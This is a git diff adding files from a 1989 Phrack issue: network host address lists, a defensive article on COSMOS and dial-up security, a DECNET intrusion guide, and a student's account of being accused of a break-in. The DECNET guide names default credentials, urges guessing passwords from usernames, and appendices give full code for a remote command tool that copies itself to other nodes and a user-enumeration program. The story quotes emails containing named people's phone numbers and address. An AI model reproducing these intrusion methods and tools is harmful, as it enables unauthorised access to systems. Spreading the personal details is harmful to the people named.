+|           whether you're a student at the ETH or not and then wait a few
+|           days).
+|           (Username=MAC)
+|  VisInfo  Informations server of the VIS (Verein der InformatikStudenten)
+|           Contains some boards with mail from several networks and from
+|           local sources.  Has a CHAT (closed during prime time hours). Free
+|           access.
+|           (Username=VISINFO)
+|
+===============================================================================
+|
+| Local addresses at CERN (0228 468 114 0510):
+|
+|   17  Lyon (own network)
+|   23  PAD
+|   31  VXOMEG
+|   41  Wisconsin/Madison
+|   42  CERNLINE 193
+|   45  DECserver
+|   51  ALEPH
+|   56  MERLIN VAX
+|   61  (Prompt )
+|   72  Wylbur / VM
+|  100  Wylbur / VM
+|  101  VM/370 CERNVM
+|  102  VM/370 CERNVMB
+|  103  VM/370 CERNVM
+|  110  VXLDB1 VAX 8650 VMS 4.6
+|  111  Information
+|  112  VXSB
+|  115  VXLDB1
+|  120  Service CAD_CAM (VAX 8650+VAX785)/SYSTEME=VMS 4.6
+|  121  CAD_CAM
+|  122  VXCERN
+|  123  VXCERN
+|  124  BSD
+|  125  CERNVM
+|  127  PAD
+|  130  L3 test beam VXC3
+|  137  ALEPH-TPC
+|  140  VXEPEL
+|  141  DECserver 200 ("user friendly")
+|  142  CERNADD
+|  146  VXEPEL
+|  147  Uni Genf TEC VAXTEC
+|  151  CCVAX / DECserver 200
+|  152  Uni Genf WA70
+|  154  ALEPH 750 Fastbus VAX
+|  161  MCR
+|  162  MCR
+|  166  VXWA80
+|  167  cernvax
+|  170  VXINFN
+|  175  ALEPH
+|  176  MCR with HELP
+|  X29  X25 Gateway
+|
+===============================================================================
+|
+| Addresses on Merit (0228 468 114 0583):
+|
+|  The principal host computers on Merit are:
+|
+|   Name        System/machine       Organization           Location
+|   ----        -----------------    -------------------    -------------
+|   MSUnet-IBM  VM/CMS IBM 3090-180  Michigan State Univ    East Lansing
+|    OU         Multics Honeywell    Oakland Univ           Rochester
+|    UB         MTS IBM 3090-400     Univ of Michigan       Ann Arbor
+|    UM         MTS IBM 3090-400     Univ of Michigan       Ann Arbor
+|    WM         DECsystem-10         Western Michigan Univ  Kalamazoo
+|    WU         MTS Amdahl 470V/8    Wayne State Univ       Detroit
+|
+|  If you have a question about the use of the Merit Network, call
+|  (313) 764-9423 and ask for a user consultant.
+|
+|  Other host computers and services available on the Merit network:
+|
+|  Autonet             CMU-Cyber           CMU-IBM          Datapac
+|  DIALOUT-AA          DIAL1200-AA         DIAL2400-AA      DIAL300-AA
+|  EMU-VAX             IGW                 ITI              MAGNET
+|  MSU-CLSI            MSU-CLVAX1          MSU-EGRNET       MSU-IBM
+|  MSU                 MTU                 MTUS5            OU-SecsNet
+|  RPI                 RUAC                Survey           Telenet
+|  UM-Annex            UM-CIC              UM-CLINFO        UM-dippy
+|  UM-DSC              UM-EnginHarris      UM-MMVAX         UM-Public-Service
+|  UM-QuickSlides      UM-RAVAX            UM-zippy         UMD-LIB
+|  UMLIB               UMLIB-300           WAYNEST1         WAYNEST2
+|  WMU-CAE             WMU-Kanga           WMU-Pooh         WMU-Puff
+|  WMU-Tigger          WMU-Winnie          WSU-CSVAX        WSU-ET
+|  WSUNET              ZOOnet-KCollege     ZOOnet-KVCC      ZOOnet-Nazareth
+|
+|  Some of the other computers and services which can be accessed via Telenet,
+|  Autonet, and Datapac:
+|
+|  ABA/NET             ACP                 ADPNS-261        ADPNS-3
+|  ADPNS-446           ADPNS-9             Alberta          ARTFL
+|  Automail-23         Automail-297        Boeing           British-Columbia
+|  BRS                 Cal-Berkeley        Calgary          Caltech-HEP
+|  Carnegie-DEC-20     Carnegie-MICOM      Carnegie-11/45   CompuServe
+|  Comshare            Cornell             Dalhousie        DatapacInfo
+|  Dialcom             Dialog              Dow-Jones        Guelph
+|  Guelph-Cosy         Illinois            Illinois-Cyber   LEXIS
+|  Manitoba            Maryland-Unix       McGill           MGH
+|  Minnesota-Cyber     Minnesota-VAX       MIT-Multics      MIT-VM
+|  Montreal            Natl-Lib-Med        NCAR-Telenet     New-Brunswick
+|  Newsnet             NJIT-EIES           NLM              NLM-MCS
+|  Notre-Dame          NRC                 NYTimes          OAG
+|  Queens              Rice                SDC              SFU
+|______________________________________________________________________________
diff --git a/phrack27/5.txt b/phrack27/5.txt
new file mode 100644
index 0000000..6b07d6d
--- /dev/null
+++ b/phrack27/5.txt
@@ -0,0 +1,232 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 5 of 12
+
+
+                                    COSMOS
+
+                   COmputer System for Mainframe OperationS
+
+                                   Part Two
+
+                                by King Arthur
+
+
+     This article will present solutions to the computer security problems
+presented in my previous file.  The following are simple but often neglected
+items which if properly treated can immensely increase your company's computer
+security.  These points apply not merely in regards to COSMOS, but to all
+computers in all companies.
+
+
+A) Dial-Up Security:
+
+     When securing a computer system, regardless of its type, it's important to
+remember this: the only way someone can remotely access your system is if there
+is a dial-up line leading to that system.  If your system has a dial-up, make
+sure that you have taken every possible precaution to secure that line.  "The
+one piece of advice I would give is:  Be careful with dial-up lines," says
+Bellcore's Ed Pinnes.
+
+     Dave Imparato, Manager of Database Management at New York Telephone, says,
+"We have devices that sit in front of our computers that you have to gain
+access to.  In order to even get to COSMOS, there are three or four levels of
+security you have to go through, and that's before you even get to the system."
+
+Rules for protection of Dial-Up lines:
+
+1.  Have as few dial-up lines as possible.  Private lines or direct connections
+    are often a viable replacement for dial-up lines.
+
+2.  If you must have phone lines going to your computer, use external hardware,
+    if possible.  For instance, the Datakit Virtual Circuit Switch (VCS) will
+    require a user to specify an "access password" and a system destination to
+    specify which system you are calling.  The VCS would then connect you to
+    the requested system which would prompt you for a login and password.
+    Using hardware similar to this serves a double purpose:
+
+         A) It is harder for someone to get into your computer, due to
+            additional passwords;
+
+         B) Employees need only dial a single number to access a number of
+            systems.
+
+    Another good type of hardware is a callback modem.  A callback modem will
+    prompt users for a login and password.  If these are correct, the modem
+    will automatically callback to a predetermined number.  At that point you
+    would login to the computer.  The advantage of callback is that unless a
+    call is placed from a certain phone, there is no way to connect.
+    Unfortunately, this is not always efficient for systems with large numbers
+    of users.
+
+    Lastly, and the most effective means of access, is to have a system which
+    does not identify itself.  A caller has to enter a secret password, which
+    doesn't display on the screen.  If a caller doesn't type the correct
+    password, the system will hang up, without ever telling the caller what has
+    happened.
+
+3.  If you ever detect "hackers" calling a certain number, it is advisable to
+    change that number.  Phone numbers should be unlisted.  According to a
+    hacker, he once got the number to an AT&T computer by asking directory
+    assistance for the number of AT&T at 976 Main Street.
+
+4.  If dial-up lines aren't used on nights or weekends, they should be
+    disabled.  Computer hackers usually conduct their "business" on nights or
+    weekends.  The COSMOS system has the ability to restrict access by time of
+    day.
+
+
+B) Password Security:
+
+     Using the analogy between a computer and a file cabinet, you can compare a
+password to the lock on your file cabinet.  By having accounts with no
+passwords you are, in effect, leaving your file cabinet wide open.  A system's
+users will often want passwords that are easy to remember.  This is not an
+advisable idea, especially for a database system with many users.  The first
+passwords tried by hackers are the obvious.  For instance if MF01 is known to
+be the user name for the frame room, a hacker might try MF01, FRAME, MDF, or
+MAINFRAME as passwords.  If it's known to a hacker that the supervisor at the
+MDF is Peter Pinkerton,  PETE or PINKERTON would not be very good passwords.
+
+Rules for password selection:
+
+1.  Passwords should be chosen by system administrators or the like.  Users
+    will often choose passwords which provide no security.  They should not be
+    within the reach of everybody in the computer room, but instead should be
+    sent via company mail to the proper departments.
+
+2.  Passwords should be changed frequently, but on an irregular basis -- every
+    four to seven weeks is advisable.  Department supervisors should be
+    notified of password changes via mail, a week in advance.  This would
+    ensure that all employees are aware of the change at the proper time.  One
+    thing you don't want is mass confusion, where everybody is trying to figure
+    out why they can't access their computers.
+
+3.  System administrators' passwords should be changed twice as often because
+    they can allow access to all system resources.  If possible, system
+    administrator accounts should be restricted from logging in on a dial-up
+    line.
+
+4.  A password should NEVER be the same as the account name.  Make sure that
+    ALL system defaults are changed.
+
+5.  Your best bet is to make passwords a random series of letters and  numbers.
+    For example 3CB06W1, Q9IF0L4, or F4W21D0.  All passwords need not be the
+    same length or format.  Imparato says, "We built a program in a PC that
+    generates different security passwords for different systems and makes sure
+    there's no duplication."
+
+6.  It's important to change passwords whenever an employee leaves the company
+    or even changes departments.  Imparato says, "When managers leave our
+    organization, we make sure we change those passwords which are necessary to
+    operate the system."
+
+7.  The Unix operating system has a built-in "password aging" feature, which
+    requires a mandatory change of passwords after a period of time.  If you
+    run any Unix-based systems, it's important to activate password aging.
+
+8.  When you feel you have experienced a problem, change ALL passwords,  not
+    just those passwords involved with the incident.
+
+
+C) Site security:
+
+     There have been a number of articles written by hackers and published in
+2600 Magazine dealing with garbage picking or what hackers call "trashing".
+It's important to keep track of what you throw out.  In many companies,
+proprietary operations manuals are thrown out.  COSMOS itself is not a
+user-friendly system.  In other words, without previous exposure to the system
+it would be very difficult to operate.  Bellcore's Beverly Cruse says, "COSMOS
+is used in so many places around the country, I wouldn't be surprised if they
+found books... in the garbage, especially after divestiture.  One interesting
+thing about a COSMOS article written by hackers, is that there was a lot of
+obsolete information, so it shows that wherever the information came from... it
+was old."
+
+Rules for site security:
+
+1.  Although it may seem evident, employees should be required to show proper
+    identification when entering terminal rooms or computer facilities.  It's
+    doubtful that a hacker would ever attempt to infiltrate any office, but
+    hackers aren't the only people you have to worry about.
+
+2.  Urge employees to memorize login sequences.  It's a bad idea for passwords
+    to be scribbled on bits of paper taped to terminals.  Eventually, one of
+    those scraps may fall into the wrong hands.
+
+3.  Garbage should be protected as much as possible.  If you use a private
+    pick-up, keep garbage in loading docks, basements, or fenced-off areas. If
+    you put your garbage out for public sanitation department pick-up, it's a
+    good idea to shred sensitive materials.
+
+4.  Before throwing out old manuals or books, see if another department could
+    make use of them.  The more employees familiar with the system, the less of
+    a chance that there will be a security problem.
+
+5.  Printing terminals should be inspected to make sure that passwords are not
+    readable.  If passwords are found to echo, check to see if the duplex is
+    correct.  Some operating systems allow you to configure dial-ups for
+    printer use.
+
+
+D) Employee Security:
+
+     When a hacker impersonates an employee, unless he is not successful there
+is a great chance the incident will go unreported.  Even if the hacker doesn't
+sound like he knows what he's talking about, employees will often excuse the
+call as an unintelligent or uninformed person.  It's unpleasant to have to
+worry about every call with an unfamiliar voice on the other end of the phone,
+but it is necessary.
+
+Rules for employee security:
+
+1.  When making an inter-departmental call, always identify yourself with:
+    1) Your name; 2) Your title; and 3) Your department and location.
+
+2.  Be suspicious of callers who sound like children, or those who ask you
+    questions that are out of the ordinary.  Whenever someone seems suspicious,
+    get their supervisor's name and a callback number.  Don't discuss anything
+    sensitive until you can verify their identity.  Don't ever discuss
+    passwords over the phone.
+
+3.  When there is a security problem with a system, send notices to all users
+    instructing them not to discuss the system over the phone, especially if
+    they do not already know the person to whom they are talking.
+
+4.  Remind all dial-up users of systems, before hanging up.
+
+5.  If security-minded posters are put up around the workplace, employees are
+    bound to take more care in their work and in conversations on the phone.
+
+6.  If managers distribute this and other computer security articles to
+    department supervisors employee security will be increased.
+
+
+E) General Security:
+
+     Bellcore recently sent a package to all system administrators of COSMOS
+systems.  The package detailed security procedures  which applied to COSMOS and
+Unix-based systems.  If you are a recipient of this package, you should re-read
+it thoroughly to ensure that your systems are secure.  Cruse says, "Last
+year... I had a call from someone within an operating company with a COSMOS
+security problem.  All we really did was give them documentation which reminded
+them of existing security features...  There is built-in security in the COSNIX
+operating system...  We really didn't give them anything new at the time.  The
+features were already there; we gave them the recommendation that they
+implement all of them."
+
+     If you feel you may not be using available security features to the
+fullest, contact the vendors of your computer systems and request documentation
+on security.  Find out if there are security features that you may not be
+currently taking advantage of.  There are also third party software companies
+that sell security packages for various operating systems and computers.
+
+     Computer security is a very delicate subject.  Many people try to pretend
+that there is no such thing as computer crime.  Since the problem exists, the
+best thing to do is to study the problems and figure out the best possible
+solutions.  If more people were to write or report about computer security, it
+would be easier for everyone else to protect themselves.  I would like to see
+Bellcore publish security guidelines, available to the entire
+telecommunications industry.  Keep in mind, a chain is only as strong as its
+weakest link.
+_______________________________________________________________________________
diff --git a/phrack27/6.txt b/phrack27/6.txt
new file mode 100644
index 0000000..75bbb4a
--- /dev/null
+++ b/phrack27/6.txt
@@ -0,0 +1,332 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 6 of 12
+
+                 <<<<<<<<<<<<<<<<<<<<<<*>>>>>>>>>>>>>>>>>>>>>>
+                 <<<                                       >>>
+                 <<<       Looking Around In DECNET        >>>
+                 <<<                                       >>>
+                 <<<    by Deep Thought of West Germany    >>>
+                 <<<                                       >>>
+                 <<<             June 1, 1989              >>>
+                 <<<                                       >>>
+                 <<<<<<<<<<<<<<<<<<<<<<*>>>>>>>>>>>>>>>>>>>>>>
+
+
+Disclaimer:  I take no responsibility for any use or abuse of the information
+             contained in this article, nor for any damage caused by the use of
+             methods described.  DECNET, VAX, and VMS are possibly registered
+             trademarks of Digital Equipment Corporation.
+
+
+There comes a time when every somewhat intelligent programmer asks:  Is hacking
+difficult?  Now, being in a university network, why don't just give it a try?
+Since one is an official student and somewhat authorized to use the computing
+facilities, testing the modern means of communication should cause no trouble.
+
+Well, you start searching on those nodes, you have official access for
+interesting programs and procedures.  And you find:  Netdcl, just one program
+of many, that obviously enables one to run commands on remote nodes without
+having an account on these nodes.  A really interesting thing, as nearly
+everything is allowed that a normal user can do.
+
+The dear reader may start to think:  Wasn't there always the shouting about VMS
+being the MOST SECURE computer system, making it UNPENETRABLE to hackers?  Ok,
+cool down, this feature can be disabled and so, you think, if someone has super
+secret data on his VAX, he will stop any use or abuse of this feature.
+
+2nd Act -- Somewhere one has heard about some mystery things called system
+calls.  Since one always wanted to know about how to react on keystrokes on a
+VAX (really being not trivial!) you start reading the manuals more precisely to
+find out how to do it in Pascal.
+
+Randomly on browsing thru the pages you discover functions which deliver
+information about Userids.  This comes in handy, as a friend engaged in
+university politics wants to distribute a leaflet by email to all registered
+users.  In fact, it's completely unproblematic to gain a list of all users.  An
+example program, although written in Assembler, is even contained in the
+manuals.  Enjoy a list of 1000 Userids complete with information about network
+access rights.  The Pascal program is contained in Appendix B (later in this
+file).
+
+Sorry, passwords are not stored in this list.  Even the Sysop can't access
+them, so that's no great loss.  Guess what passwords many accounts have?  Sure,
+just try the username.  It's really amazing how ignorant users can be.  Of
+course this is a problem of group-accounts, that many users have access to and
+must know the password.  Nevertheless, the hole is there.
+
+The real hacker, once he has logged in on such an account surely finds ways to
+gain system privilege.  This requires in-depth knowledge of the Kernel of VMS
+and is another story I won't deal with.
+
+
+What is DECNET?
+~~~~~~~~~~~~~~~
+DECNET is the means, by which computers from Digital Equipment Corporation
+(DEC) can be connected to each other.  Each computer in this network has an
+address which is normally given by x.y where x is the area number (an integer)
+and y is the node number in this area which ranges from 1 to 1023.  To access
+DECNET nodes, one specifies just one number, which can be computed from x and y
+by the following formula:
+
+   nodenumber = x * 1024 + y
+
+Often nodes, especially local nodes (having the same area number as your
+current node) have names assigned to them so they can be memorized more easily.
+
+
+Interesting DECNET Commands
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+To get a (first) list of available DECNET nodes, try the command
+
+   $ SHOW NET
+
+The $ (as in the following examples) is the default prompt of VMS and should
+not be entered.  This Command will give you a list of (hopefully) reachable
+nodes.  All lines of the output contain the network address in the form x.y and
+normally a name which this node is known by.
+
+Your current node is mentioned in the first line in "VAX/VMS network status for
+local node X.Y Name".  In most cases you will then just see local nodes listed
+and a line saying "The next hop to the nearest area router is node XX.YY".
+This node contains more information about the DECNET than the node you are
+currently on.  If you have an account on the specified node, log on there and
+try again.  If not, well, play with the local nodes listed and look at the
+command NCP shown later.
+
+Now, what can you do with those nodes that were mentioned in the output?
+First command is
+
+    $ SET HOST <node>
+
+Where <node> is either a nodename or a nodenumber (see above).  Thus, if SDIVAX
+was listed in the SHOW NET list as 42.13, then you may try both SET HOST SDIVAX
+or SET HOST 43021 (42*1024+13 = 43021).  Probably you'll get that ugly
+Username: prompt.  You're on your own then.
+
+Second thing you can do with DECNET is email.  On VMS the MAIL program can send
+mail to other users.  If you and your friend both have accounts on the same
+DECNET, you can send him mail if you know his nodename or nodenumber by
+specifying SDIVAX::FREDDY or 43021::FREDDY.
+
+Then there is PHONE.  This is a utility to talk to another (or several) user(s)
+on a DECNET.  If you want to call Freddy, just type PHONE SDIVAX::FREDDY.  If
+he is logged in, his terminal will ring and if he answers his phone (with PHONE
+ANSWER) you may chat with him.  PHONE has another nice feature built in:  You
+may ask for a list of active users on a remote name by %DIR SDIVAX.  See the
+online help on PHONE for further details.
+
+The next really mighty DECNET facility is remote file access.  Valid filenames
+in VMS consist of the components node, disk, directory and filename.  An
+example for a valid filename is SDIVAX::DISK$2:[NASA.SECRET]SDI.DOC where some
+components may be omitted and default values are used instead.
+
+File names including the node specification may be used in nearly all VMS
+commands examples being DIR, TYPE and COPY.  Access to the specified file is
+granted, if the protection of the file allows access by world, or if the owner
+of the file is the user DECNET.  This pseudo userid is available on every VAX
+and has the password DECNET.  Access to that account is limited to network
+processing so you can't just log in with Username=DECNET, password=DECNET.  By
+default a special directory owned by the User DECNET exists on each node.  This
+directory can be accessed by just specifying the nodename without any disk or
+directory information, as in
+
+    $ DIR SDIVAX::
+
+If users played too much with this feature, the directory may be protected or
+otherwise disabled.
+
+The last feature described here is the remote command processing facility.  If
+you try to open a file with the specification
+
+    $ SDIVAX::"task=foo.com"
+
+Instead of opening the DCL procedure, foo.com will be executed.  To make use of
+this feature easily, programs have been written to interactively communicate
+with a remote host.  The command procedure NETDCL.COM does this task and is
+contained in the Appendix A (seen later in this file.  Look at this
+DCL-Procedure to learn more about DECNET features.
+
+
+The Key To Universal Knowledge
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+There is a pearl under the programs on a VAX.  It's called NCP and will give
+readily information about the whole DECNET.  You start this program either by
+MCR NCP or by doing a SET DEF SYS$SYSTEM and RUN NCP.  Use the on-line Help
+provided in NCP (which means Network Control Program) to learn more.
+
+    NCP> SHOW KNOWN NODES
+
+Provides a list of all nodes known on your current node, including the names
+you may use as node specifications.  But there is more:  You may connect to
+another node's database and get a list of nodes which are known at the remote
+node with
+
+    NCP> SET EXEC SDIVAX
+
+And then again the SHOW KNOWN NODES command.  This feature should provide you
+with a nearly infinite list of node names and node numbers.
+
+
+Conclusion
+~~~~~~~~~~
+There are many nice features available under DECNET.  Probably I don't know
+all, but I hope this article showed you the mighty tools available on VMS to
+make network life easier.
+
+
+WARNING:  The author has had bad experiences with some node administrators,
+          who didn't like their machines being contacted over DECNET.  Yes,
+          that's the drawback, each DECNET activity is written to a protocol
+          file that is printed and deleted every month.  So you should be
+          careful in using DECNET.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+APPENDIX A:
+
+The Procedure NETDCL.COM, sometimes called TELL.COM, NET.COM
+-----------------------
+$ IF f$mode() .EQS. "NETWORK" THEN GOTO network
+$ IF p1 .EQS. "" THEN READ/PROMPT="_Node: " sys$command p1
+$ nodespec = p1 - "::"
+$ nodename = f$extract(0,f$locate("""",nodespec),nodespec)
+$! include the following line for "hard cases"
+$! nodespec = nodespec+"""decnet decnet"""
+$ ON WARNING THEN CONTINUE
+$ CLOSE/ERR=open_server dcl_server
+$open_server:
+$ OPEN/READ/WRITE dcl_server 'nodespec'::"TASK=NETDCL"/ERROR=open_failure
+$ ON WARNING THEN GOTO exit
+$flush_output:
+$ READ dcl_server record
+$ IF record .EQS. "SEND_ME_A_COMMAND" -
+  THEN GOTO send_command
+$ WRITE sys$output record
+$ GOTO flush_output
+$send_command:
+$ IF p2 .NES. "" THEN GOTO single_command
+$ READ sys$command record /PROMPT="''nodename'> " /END=exit
+$ record  := 'record
+$ IF record .EQS. "EXIT" THEN GOTO exit
+$ WRITE dcl_server record
+$ GOTO flush_output
+$single_command:
+$ command := 'p2' 'p3' 'p4' 'p5' 'p6' 'p7' 'p8'
+$ WRITE dcl_server command
+$single_flush:
+$ READ dcl_server record
+$ IF record .EQS. "SEND_ME_A_COMMAND"-
+$ THEN GOTO exit
+$ WRITE sys$output record
+$ GOTO single_flush
+$open_failure:
+$ ON WARNING THEN EXIT
+$ COPY/LOG Netdcl.Com 'nodespec'::
+$ WAIT 0:0:1
+$ OPEN/READ/WRITE dcl_server 'nodespec'::"TASK=NETDCL"
+$ ON WARNING THEN GOTO exit
+$ GOTO flush_output
+$exit:
+$ CLOSE dcl_server
+$ EXIT
+$network:
+$ OPEN/READ/WRITE dcl_link sys$net
+$ SET NOON
+$ dcl_verify = 'f$verify(0)'
+$ DEFINE sys$output dcl_link:
+$server_loop:
+$ WRITE dcl_link "SEND_ME_A_COMMAND"
+$ READ dcl_link dcl_string /END_OF_FILE=server_exit /ERROR=server_exit
+$ 'dcl_string'
+$  GOTO server_loop
+$server_exit:
+$ IF dcl_verify THEN set verify
+$ CLOSE dcl_link
+$ DEASSIGN sys$output
+$ EXIT
+-----------------------
+
+APPENDIX B
+
+ALLUSER.PAS - Show all registered users
+-----------------------
+{
+* alluser.pas - get names of all users
+* by Deep, 1989
+* This program is freely redistributable as long no modifications are made
+* DISCLAIMER: I take no responsibility for any use or abuse of this
+*             program.  It is given for informational purpose only.
+*
+* program history:
+* 04-May-89   started
+* 02-Jun-89   clean up of code
+}
+[inherit ('sys$library:starlet.pen')]
+program alluser(input,output);
+
+  type $word      = [word] 0..65535;
+       $byte      = [byte] 0..255;
+       $quadword  = record
+                      lo,hi : unsigned;
+                    end;
+       $uquad  = record
+                      lo,hi : unsigned;
+                    end;
+var
+  id: unsigned;
+  status, status2: integer;
+  length: $WORD;
+  attrib,context,context2,context3: unsigned;
+  ident, ident2: unsigned;
+  name: varying [512] of char;
+  holder: $uquad;
+
+begin
+
+writeln('Alluser - use at your own risk!');
+status := SS$_NORMAL;
+{ id = -1 selects next identifier }
+id := -1;
+context := 0;
+while (status <> SS$_NOSUCHID) do
+   begin
+   { find next identifier }
+   status := $idtoasc(id,name.length,name.body,ident,attrib,context);
+   if (status <> SS$_NOSUCHID) then begin
+      write(pad(name,' ',16));
+      if (ident div (65536*32768) > 0) then
+         { it's a rights-list, so print the hex-value of the identifier }
+         begin
+         writeln(oct(ident,12));
+         context2 := 0;
+         context3 := 0;
+         { find all holders of this right }
+         repeat
+            holder := zero;
+            status2 := $find_holder(ident,holder,attrib,context2);
+            if (holder.lo <> 0) then begin
+                ident2 := ident;
+                { get UIC and username }
+                status := $idtoasc(holder.lo,name.length,name.body,ident2
+                    ,attrib,context3);
+                write('                ',pad(name,' ',16));
+                writeln('[',oct(holder.lo div 65536,3),','
+                    ,oct(holder.lo mod 65536,3),']');
+               end;
+         until (holder.lo = 0);
+         end
+      else
+         { it's a UIC, so translate to [grp,user] }
+         begin
+         writeln('[',oct(ident div 65536,3),',',oct(ident mod 65536,3),']');
+         end;
+      end;
+   end;
+end.
+-----------------------
+
+This article has been brought to you by Deep Thought of West Germany.  If you
+liked this article, grant me access if I once drop in your BBS!
+_______________________________________________________________________________
+
+
diff --git a/phrack27/7.txt b/phrack27/7.txt
new file mode 100644
index 0000000..903d608
--- /dev/null
+++ b/phrack27/7.txt
@@ -0,0 +1,175 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 27, File 7 of 12
+
+               <:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:>
+               <:>                                          <:>
+               <:>          The Making Of A Hacker          <:>
+               <:>                                          <:>
+               <:>        by Framstag of West Germany       <:>
+               <:>                                          <:>
+               <:>                June 2, 1989              <:>
+               <:>                                          <:>
+               <:><:><:><:><:><:><:><:><:><:><:><:><:><:><:><:>
+
+
+Prologue For None VMS Users
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+     DECnet is the network for DEC machines, in most cases you can say VAXes.
+DECnet allows you to do:   - e-mail
+                           - file transfer
+                           - remote login
+                           - remote command
+                           - remote job entry
+                           - PHONE
+     PHONE is an interactive communication between users and is equal to TALK
+on UNIX or a "deluxe"-CHAT on VM/CMS.
+
+     BELWUE, the university network of the state Baden-Wuerttemberg in
+West Germany contains (besides other networks) a DECnet with about 400 VAXes.
+On every VAX there is standard-account called DECNET with pw:= DECNET, which is
+not reachable via remote login.  This account is provided for several
+DECnet-Utilities and as a pseudo-guest-account.  The DECNET-account has very
+restricted privileges:  You cannot edit a file or make another remote login.
+
+    The HELP-menu is equipped by the system and is similar to the MAN command
+on UNIX.
+
+    More information on DECnet can be found in "Looking Around In DECnet" by
+Deep Thought in this very issue of Phrack Inc.
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     Here, at the University of Ulm, we have an *incredibly* ignorant computer
+center staff, with an even bigger lack of system-literature (besides the 80 kg
+of VAX/VMS-manuals).  The active may search for information by himself, which
+is over the level of "run," "FORTRAN," or "logout."  My good luck that I have
+other accounts in the BELWUE-DECnet, where more information is offered for the
+users.  I am a regular student in Ulm and all my accounts are completely legal
+and corresponding to the German laws.  I don't call myself a "hacker," I feel
+more like a "user" (...it's more a defining-problem).
+
+     In the HELP-menu in a host in Tuebingen I found the file netdcl.com and
+the corresponding explanation, which sends commands to the DECNET-Account of
+other VAXes and executes them there (remote command).  The explanation in the
+HELP-menu was idiot-proof -- therefore for me, too :-)
+
+     With the command "$ mcr ncp show known nodes" you can obtain a list of all
+netwide active VAXes, as is generally known, and so I pinged all these VAXes to
+look for more information for a knowledge-thirsty user.  With "help", "dir" and
+other similar commands I look around on those DECnet accounts, always watching
+for topics related to the BELWUE-network.  It's a pity, that 2/3 of all VAXes
+have locked the DECNET-Account for NETDCL.COM.  Their system managers are
+probably afraid of unauthorized access, but I cannot imagine how there could be
+such an unauthorized access, because you cannot log on this account -- no
+chance for trojan horses, etc.
+
+     Some system managers called me back after I visited their VAX to chat with
+me about the network and asked me if they could help me in any way. One sysop
+from Stuttgart even sent me a version of NETDCL.COM for the ULTRIX operation
+system.
+
+     Then, after a month, the  H O R R O R  came over me in shape of a the
+following mail:
+
+--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
+From:   TUEBINGEN::SYSTEM       31-MAY-1989 15:31:11.38
+To:     FRAMSTAG
+CC:
+Subj:   don't make any crap, or you'll be kicked out!
+
+From:   ITTGPX::SYSTEM       29-MAY-1989 16:46
+To:     TUEBINGEN::SYSTEM
+Subj:   System-breaking-in 01-May-1989
+
+To the system manager of the Computer TUEBINGEN,
+
+On May 1st 1989 we had a System-breaking-in in our DECNET-account, which
+started from your machine.  By help of our accounting we ascertained your user
+FRAMSTAG to have emulated an interactive log-on on our backbone-node and on
+every machine of our VAX-cluster with the "trojan horse" NETDCL.COM.  Give us
+this user's name and address and dear up the occurrence completely.  We point
+out that the user is punishable.  In case of repetition we would be forced to
+take corresponding measures.  We will check whether our system got injured.  If
+not, this time we will disregard any measure.  Inform us via DECnet about your
+investigation results -- we are attainable by the nodenumber 1084::system
+
+Dipl.-Ing. Michael Hager
+--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
+
+     My system manager threatened me with the deleting of my account, if I
+would not immediately enlighten the affair.  *Gulp*!
+     I was conscious about my innocence, but how to tell it to the others?  I
+explained, step by step, everything to my system manager.  He then understood
+after a while, but the criminal procedure still hovered over me... so, I took
+quickly to my keyboard, to compose file of explanations and to send it to that
+angry system manager in Stuttgart (node 1084 is an institute there).  But no
+way out:  He had run out of disk quota and my explanation-mail sailed into the
+nirwana:
+
+--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
+$ mail explanation
+  To:   1084::system
+%MAIL-E, error sending to user SYSTEM at 1084
+%MAIL-E-OPENOUT, error opening SYS$SYSROOT:[SYSMGR]MAIL$00040092594FD194.MAI;
+as output
+-RMS-E-CRE, ACP file create failed
+-SYSTEM-F-EXDISKQUOTA, disk quota exceeded
+--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
+
+     Also the attempt of a connection with the PHONE-facilty failed:  In his
+borderless hacker-paranoia, he cut off his PHONE... and nowhere is a list with
+the REAL-addresses of the virtual DECnet-addresses available (to prevent
+hacking).  Now I stood there with the brand "DANGEROUS HACKER!" and I had no
+chance to vindicate myself.  I poured out my troubles to an acquaintance of
+mine, who is a sysop in the computer-center in Freiburg.  He asked other sysops
+and managers thru the whole BELWUE-network until someone gave him a telephone
+number after a few days -- and that was the right one!
+
+     I phoned to this Hager and told him what I had done with his
+DECnet-account and also what NOT.  I wanted to know which crime I had
+committed.  He promptly cancelled all of his reproaches, but he did not excuse
+his defamous incriminations.  I entreated him to inform my system manager in
+Tuebingen that I have done nothing illegal and to stop him from erasing my
+account.  This happens already to a fellow student of mine (in this case, Hager
+was also guilty).  He promised me that he would officially cancel his
+reproaches.
+
+     After over a week this doesn't happen (I'm allowed to use my account
+further on).  In return for it, I received a new mail from Hager on another
+account of mine:
+
+--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
+From:   1084::HAGER         1-JUN-1989 12:51
+To:     50180::STUD_11
+Subj:   System-breaking-in
+
+On June 1st 1989 you have committed a system-breaking-in on at least one of our
+VAXes.  We were able to register this occurrence.  We would be forced to take
+further measure if you did not dear up the occurrence completely until June
+6th.
+
+Of course the expenses involved would be imposed on you.  Hence enlightenment
+must be in your own interest.
+
+We are attainable via DECnet-mail with the address 1084::HAGER or via following
+address:
+
+Institut fuer Technische Thermodynamik und Thermische Verfahrenstechnik
+Dipl.-Ing. M. Hager    Tel.: 0711/685-6109
+Dipl.-Ing. M. Mrzyglod Tel.: 0711/685-3398
+Pfaffenwaldring 9/10-1
+7000 Stuttgart-80
+
+ M. Hager
+ M. Mrzyglod
+--- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- --- ---
+
